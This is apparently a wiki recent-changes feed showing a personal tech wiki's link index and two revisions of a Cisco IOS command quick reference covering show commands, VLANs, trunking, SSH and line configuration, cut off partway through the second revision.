Windows: |&lt;br /&gt;
[[Commands]] | [[Win+R Shortcuts]] | [[Windows Keyboard Shortcuts]] | [[Remote Desktop Setup]] | [[End of Life]] | [[Make CMD Open Faster on Windows 11]] | [[Hyper-V on Windows Home]] | [[Domain Setup from Scratch on Server Core]] | [[Example User onboarding &amp;amp; offboarding Scripts for 365]] | [[Keyboard Navigation Scripts]] | [[Registry Tweaks/Fixes]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Linux: | [[Distro Download Links]] | [[Linux Commands|Commands]] | [[Docker-Compose]] | [[Bashrc/Zshrc Setup]] | [https://arachnoid.com/SecureShell/index.html Arachnoid.com: How to use SSH] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/How%20to%20Use%20Secure%20Shell.pdf pdf] | [[Libvirt Setup]] | [[VFIO GPU Passthrough Setup]] | [[VFIO Anti-Cheat Bypass Tools]] | [[Xubuntu Mac Conversion Guide]] | [[Ungoogled Chromium Debian]] | [[Docker Installation on Debian]] | [[Infared Reciever w/ Alpine on the Bulldozer Datto]] | [[Numpad hotkeys on linux]] | [[Split a monitor in two]] | [[Make a udev rule]] | [[Type Unicode Characters]] | [[Screen Recording Options]] | [[Microsoft Authenticator]] | [https://www.debugpoint.com/kvm-share-folder-windows-guest/ Setup A Share Folder between a Linux host and Windows Guest] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/Share%20Folder%20Between%20Windows%20Guest%20and%20Linux%20Host%20in%20KVM%20using%20virtiofs.pdf pdf] | [[Perform actions based on notification content]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pentesting&lt;br /&gt;
&lt;br /&gt;
[[Performing a SYN flood attack]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MacOS: | [[OSX Commands]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Javascript: | [[VM Userscript to disable website right-click and copy-blocking]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Python: | [[Math Operators]] | [[Python Examples|Examples]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cisco: | [[Cisco Commands|Commands]] | [[Cisco Keyboard Shortcuts|Keyboard Shortcuts]] | [[Example configuration files]] | [[Ethernet: Straight-through VS Crossover Cable]] | [https://en.wikipedia.org/wiki/Path_MTU_Discovery Path MTU Discovery] | [[ipv6]] | [[802.1q]] (Vlan Tagging) |&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Robotics: | [[Nao Robot]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Retro Tech: |&lt;br /&gt;
[[Analog Video Articles]] | [[Modeline Generators]] | [https://github.com/antonioginer/ATOM-15 ATOM-15: AMD/ATI Card 15khz bios] | [https://luigiblood.tumblr.com/post/711882982704726016/everything-datamined-about-gba-nso-so-far Deep Dive into Nintendo Switch NSO GBA Link Cable Emulation] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/Yakumono&#039;s%20Blog_%20Everything%20datamined%20about%20GB_A%20NSO%20so%20far..pdf pdf]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Digital Archives: |&lt;br /&gt;
[https://archive.org archive.org] | [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes kirb.feels archive] [https://en.wikipedia.org/wiki/Library_Genesis Library Genesis]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Open Source Intelligence: | &lt;br /&gt;
[https://osintframework.com/ OsINT Framework] | [https://www.usphonebook.com/ USPhoneBook]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/YdGUYXws5mD2fxFKxg.webp ☕Happy Monday =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/giphy.webp ☕Bom Dia =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/tenor.gif ☕??????]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1043</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1043"/>
		<updated>2026-01-15T21:53:23Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Interface &amp;amp; Network Status */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== System &amp;amp; Routing Basics ==&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv4 Routing (Layer 3 Switches) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 unicast-routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Routing Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip route&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface vlan 1&lt;br /&gt;
interface fa0/1&lt;br /&gt;
interface range fa0/2-3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport mode access&lt;br /&gt;
switchport access vlan 10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk encapsulation dot1q&lt;br /&gt;
switchport mode trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk VLAN Settings ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
switchport trunk native vlan 99&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== IPv6 Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1042</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1042"/>
		<updated>2026-01-15T21:50:33Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== System &amp;amp; Routing Basics ==&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv4 Routing (Layer 3 Switches) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 unicast-routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Routing Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip route&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface vlan 1&lt;br /&gt;
interface fa0/1&lt;br /&gt;
interface range fa0/2-3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport mode access&lt;br /&gt;
switchport access vlan 10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk encapsulation dot1q&lt;br /&gt;
switchport mode trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk VLAN Settings ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
switchport trunk native vlan 99&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== IPv6 Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
